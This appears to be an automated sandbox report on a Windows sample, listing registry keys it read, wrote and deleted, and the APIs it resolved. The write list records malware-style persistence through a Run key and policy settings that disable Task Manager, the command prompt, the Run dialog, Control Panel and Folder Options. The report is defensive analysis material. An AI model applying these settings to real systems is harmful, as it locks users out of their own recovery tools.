HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\Synchronization HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\AppId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="CIMWin32" HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter2 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter2 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain HKEY_CURRENT_USER\Control Panel\International\LocaleName HKEY_CURRENT_USER\Control Panel\International\sCountry HKEY_CURRENT_USER\Control Panel\International\sList HKEY_CURRENT_USER\Control Panel\International\sDecimal HKEY_CURRENT_USER\Control Panel\International\sThousand HKEY_CURRENT_USER\Control Panel\International\sGrouping HKEY_CURRENT_USER\Control Panel\International\sNativeDigits HKEY_CURRENT_USER\Control Panel\International\sCurrency HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep HKEY_CURRENT_USER\Control Panel\International\sMonGrouping HKEY_CURRENT_USER\Control Panel\International\sPositiveSign HKEY_CURRENT_USER\Control Panel\International\sNegativeSign HKEY_CURRENT_USER\Control Panel\International\sTimeFormat HKEY_CURRENT_USER\Control Panel\International\sShortTime HKEY_CURRENT_USER\Control Panel\International\s1159 HKEY_CURRENT_USER\Control Panel\International\s2359 HKEY_CURRENT_USER\Control Panel\International\sShortDate HKEY_CURRENT_USER\Control Panel\International\sYearMonth HKEY_CURRENT_USER\Control Panel\International\sLongDate HKEY_CURRENT_USER\Control Panel\International\iCountry HKEY_CURRENT_USER\Control Panel\International\iMeasure HKEY_CURRENT_USER\Control Panel\International\iPaperSize HKEY_CURRENT_USER\Control Panel\International\iDigits HKEY_CURRENT_USER\Control Panel\International\iLZero HKEY_CURRENT_USER\Control Panel\International\iNegNumber HKEY_CURRENT_USER\Control Panel\International\NumShape HKEY_CURRENT_USER\Control Panel\International\iCurrDigits HKEY_CURRENT_USER\Control Panel\International\iCurrency HKEY_CURRENT_USER\Control Panel\International\iNegCurr HKEY_CURRENT_USER\Control Panel\International\iCalendarType HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier HKEY_PERFORMANCE_TEXT\Counter HKEY_PERFORMANCE_DATA\238 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sCountry HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sList HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sDecimal HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sThousand HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sGrouping HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sNativeDigits HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sCurrency HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sMonDecimalSep HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sMonThousandSep HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sMonGrouping HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sPositiveSign HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sNegativeSign HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sTimeFormat HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sShortTime HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\s1159 HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\s2359 HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sShortDate HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sYearMonth HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sLongDate HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCountry HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iMeasure HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iPaperSize HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iDigits HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iLZero HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iNegNumber HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\NumShape HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCurrDigits HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCurrency HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iNegCurr HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCalendarType HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iFirstDayOfWeek HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Plus! ProductId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemPartition HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PriorityControl\Win32PrioritySeparation HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgJITDebugLaunchSetting HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger
Write Keys
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\jit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Delete Keys
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CustomPropertyHwIdKey
Mutexes
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName 